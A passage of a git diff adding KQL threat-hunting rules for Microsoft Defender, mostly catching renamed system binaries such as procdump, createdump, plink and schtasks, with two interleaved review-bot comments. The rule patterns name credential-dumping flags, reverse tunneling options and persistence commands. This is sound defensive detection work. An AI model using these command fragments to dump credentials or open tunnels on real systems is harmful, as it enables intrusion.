"19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run "))) and (not((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql b/KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql new file mode 100644 index 00000000..438f1514 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql @@ -0,0 +1,12 @@ +// Title: Renamed CreateDump Utility Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-20 +// Level: high +// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Command lines that use the same flags + +DeviceProcessEvents +| where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql new file mode 100644 index 00000000..463a23f7 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql 
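Review bot: The roughly forty `SHA256 startswith "<64-hex>"` clauses in the cloudflared rule's `| where` line compare full-length hashes with a prefix operator; `SHA256 in~ ("2fb6c04c…", "b3d21940…", …)` says what is meant, is a single set lookup instead of a chain of string scans, and cannot accidentally match on a truncated value. These hashes pin specific cloudflared releases and will go stale as new builds ship, so the `tunnel`/`-url`, `cleanup` and `run` command-line branches should be treated as the durable part of the detection and the hash list refreshed whenever the upstream rule changes rather than hand-edited. This hunk spans three physical lines; its `@@` header is on the first of them.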
@@ -0,0 +1,10 @@
+// Title: Renamed CURL.EXE Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-09-11
+// Level: medium
+// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql
new file mode 100644
index 00000000..4110a5a5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed FTP.EXE Execution
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql
new file mode 100644
index 00000000..86a7d55a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql
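Review bot: The exclusion `not(FolderPath contains "\\curl")` in the curl rule's `| where` line is satisfied by any directory beginning with `\curl` anywhere in the path, so a renamed binary at `C:\ProgramData\curl\update.exe` is silently allowed although the rule exists precisely to catch renamed curl. Anchor the exclusion on the file name instead, e.g. `not(FileName startswith "curl")`, or enumerate the legitimate names the way the adjacent ftp rule does with `not(FolderPath endswith "\\ftp.exe")`. FileName is the image-name column beside FolderPath in DeviceProcessEvents; confirm it is populated before relying on it.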
@@ -0,0 +1,10 @@ +// Title: Renamed Gpg.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-08-09 +// Level: high +// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql new file mode 100644 index 00000000..5f70c8ee --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Jusched.EXE Execution +// Author: Markus Neis, Swisscom +// Date: 2019-06-04 +// Level: high +// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1036.003 + +DeviceProcessEvents +| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql new file mode 100644 index 00000000..44a49312 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql 
@@ -0,0 +1,12 @@ +// Title: Renamed Mavinject.EXE Execution +// Author: frack113, Florian Roth +// Date: 2022-12-05 +// Level: high +// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_megasync_execution.kql b/KQL/rules/windows/process_creation/renamed_megasync_execution.kql new file mode 100644 index 00000000..0cc57952 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_megasync_execution.kql @@ -0,0 +1,13 @@ +// Title: Renamed MegaSync Execution +// Author: Sittikorn S +// Date: 2021-06-22 +// Level: high +// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Software that illegally integrates MegaSync in a renamed form +// - Administrators that have renamed MegaSync + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql b/KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql new file mode 100644 index 00000000..61cc55fb --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Renamed Microsoft Teams Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-12 +// Level: medium +// Description: Detects the execution of a renamed Microsoft Teams binary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName in~ ("msteams.exe", "teams.exe")) and (not((FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\teams.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql new file mode 100644 index 00000000..d632c721 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql @@ -0,0 +1,12 @@ +// Title: Renamed Msdt.EXE Execution +// Author: pH-T (Nextron Systems) +// Date: 2022-06-03 +// Level: high +// Description: Detects the execution of a renamed "Msdt.exe" binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql new file mode 100644 index 00000000..c1b2c172 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Renamed NirCmd.EXE Execution +// Author: X__Junior (Nextron Systems) +// Date: 2024-03-11 +// Level: high +// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql new file mode 100644 index 00000000..0a07c0bf --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Office Binary Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-20 +// Level: high +// Description: Detects the execution of a renamed office binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 + +DeviceProcessEvents +| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe", "Olk.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe" or FolderPath endswith "\\OLK.EXE"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql new file mode 100644 index 00000000..1d5d21f5 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Renamed PingCastle Binary Execution +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-01-11 +// Level: high +// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/renamed_plink_execution.kql b/KQL/rules/windows/process_creation/renamed_plink_execution.kql new file mode 100644 index 00000000..e60c660b --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_plink_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Plink Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-06 +// Level: high +// Description: Detects the execution of a renamed version of the Plink binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_procdump_execution.kql b/KQL/rules/windows/process_creation/renamed_procdump_execution.kql new file mode 100644 index 00000000..9bdba836 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_procdump_execution.kql 
@@ -0,0 +1,14 @@ +// Title: Renamed ProcDump Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-11-18 +// Level: high +// Description: Detects the execution of a renamed ProcDump executable. +// This often done by attackers or malware in order to evade defensive mechanisms. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Procdump illegally bundled with legitimate software. +// - Administrators who rename binaries (should be investigated). + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql b/KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql new file mode 100644 index 00000000..4f6d2b2d --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql 
@@ -0,0 +1,12 @@ +// Title: Renamed PsExec Service Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate administrative tasks + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql b/KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql new file mode 100644 index 00000000..759fc8db --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Remote Utilities RAT (RURAT) Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-19 +// Level: medium +// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.collection, attack.command-and-control, attack.discovery, attack.s0592 + +DeviceProcessEvents +| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql b/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql new file mode 100644 index 00000000..60fe47ba --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql 
@@ -0,0 +1,14 @@ +// Title: Renamed Schtasks Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-27 +// Level: high +// Description: Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks. +// One of the very common persistence techniques is schedule malicious tasks using schtasks.exe. +// Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1036.003, attack.t1053.005 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((ProcessCommandLine contains " -tn " or ProcessCommandLine contains " /tn " or ProcessCommandLine contains " –tn " or ProcessCommandLine contains " —tn " or ProcessCommandLine contains " ―tn " or ProcessCommandLine contains " -tr " or ProcessCommandLine contains " /tr " or ProcessCommandLine contains " –tr " or ProcessCommandLine contains " —tr " or ProcessCommandLine contains " ―tr " or ProcessCommandLine contains " -sc " or ProcessCommandLine contains " /sc " or ProcessCommandLine contains " –sc " or ProcessCommandLine contains " —sc " or ProcessCommandLine contains " ―sc " or ProcessCommandLine contains " -st " or ProcessCommandLine contains " /st " or ProcessCommandLine contains " –st " or ProcessCommandLine contains " —st " or ProcessCommandLine contains " ―st " or ProcessCommandLine contains " -ru " or ProcessCommandLine contains " /ru " or ProcessCommandLine contains " –ru " or ProcessCommandLine contains " —ru " or ProcessCommandLine contains " ―ru " or ProcessCommandLine contains " -fo " or ProcessCommandLine contains " /fo " or ProcessCommandLine contains " –fo " or ProcessCommandLine contains " —fo " or ProcessCommandLine contains " ―fo ") and 
(ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create " or ProcessCommandLine contains " -delete " or ProcessCommandLine contains " /delete " or ProcessCommandLine contains " –delete " or ProcessCommandLine contains " —delete " or ProcessCommandLine contains " ―delete " or ProcessCommandLine contains " -query " or ProcessCommandLine contains " /query " or ProcessCommandLine contains " –query " or ProcessCommandLine contains " —query " or ProcessCommandLine contains " ―query " or ProcessCommandLine contains " -change " or ProcessCommandLine contains " /change " or ProcessCommandLine contains " –change " or ProcessCommandLine contains " —change " or ProcessCommandLine contains " ―change " or ProcessCommandLine contains " -run " or ProcessCommandLine contains " /run " or ProcessCommandLine contains " –run " or ProcessCommandLine contains " —run " or ProcessCommandLine contains " ―run " or ProcessCommandLine contains " -end " or ProcessCommandLine contains " /end " or ProcessCommandLine contains " –end " or ProcessCommandLine contains " —end " or ProcessCommandLine contains " ―end ")) and (not(ProcessCommandLine contains "schtasks"))) or (ProcessVersionInfoOriginalFileName =~ "schtasks.exe" and (not(FolderPath endswith "\\schtasks.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql b/KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql new file mode 100644 index 00000000..df3db5cf --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Renamed SysInternals DebugView Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-28 +// Level: high +// Description: Detects suspicious renamed SysInternals DebugView execution +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 + +DeviceProcessEvents +| where ProcessVersionInfoProductName =~ "Sysinternals DebugView" and (not((FolderPath endswith "\\Dbgview.exe" and ProcessVersionInfoOriginalFileName =~ "Dbgview.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql b/KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql new file mode 100644 index 00000000..60d1182a --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql @@ -0,0 +1,12 @@ +// Title: Renamed Sysinternals Sdelete Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-06 +// Level: high +// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 +// False Positives: +// - System administrator usage + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql b/KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql new file mode 100644 index 00000000..92202d6b --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Renamed Visual Studio Code Tunnel Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-28 +// Level: high +// Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 + +DeviceProcessEvents +| where (((ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") or (ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log")) and (not((FolderPath endswith "\\code-tunnel.exe" or FolderPath endswith "\\code.exe")))) or (((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe")))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql new file mode 100644 index 00000000..484b703a --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Renamed Vmnat.exe Execution +// Author: elhoim +// Date: 2022-09-09 +// Level: high +// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_whoami_execution.kql b/KQL/rules/windows/process_creation/renamed_whoami_execution.kql new file mode 100644 index 00000000..e869e646 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_whoami_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Whoami Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-12 +// Level: critical +// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/replace_exe_usage.kql b/KQL/rules/windows/process_creation/replace_exe_usage.kql new file mode 100644 index 00000000..4a5b51be --- /dev/null +++ b/KQL/rules/windows/process_creation/replace_exe_usage.kql 
@@ -0,0 +1,10 @@ +// Title: Replace.exe Usage +// Author: frack113 +// Date: 2022-03-06 +// Level: medium +// Description: Detects the use of Replace.exe which can be used to replace file with another file +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where FolderPath endswith "\\replace.exe" and (ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql new file mode 100644 index 00000000..a4943872 --- /dev/null +++ b/KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Response File Execution Via Odbcconf.EXE +// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: medium +// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary. + +DeviceProcessEvents +| where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql new file mode 100644 index 00000000..a8632c16 --- /dev/null +++ b/KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql 
@@ -0,0 +1,12 @@ +// Title: RestrictedAdminMode Registry Value Tampering - ProcCreation +// Author: frack113 +// Date: 2023-01-13 +// Level: high +// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. +// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. +// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "DisableRestrictedAdmin" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql b/KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql new file mode 100644 index 00000000..97921781 --- /dev/null +++ b/KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql 
@@ -0,0 +1,12 @@ +// Title: Root Certificate Installed From Susp Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/ruby_inline_command_execution.kql b/KQL/rules/windows/process_creation/ruby_inline_command_execution.kql new file mode 100644 index 00000000..5ae3f71a --- /dev/null +++ b/KQL/rules/windows/process_creation/ruby_inline_command_execution.kql @@ -0,0 +1,10 @@ +// Title: Ruby Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe") \ No newline at end of file 
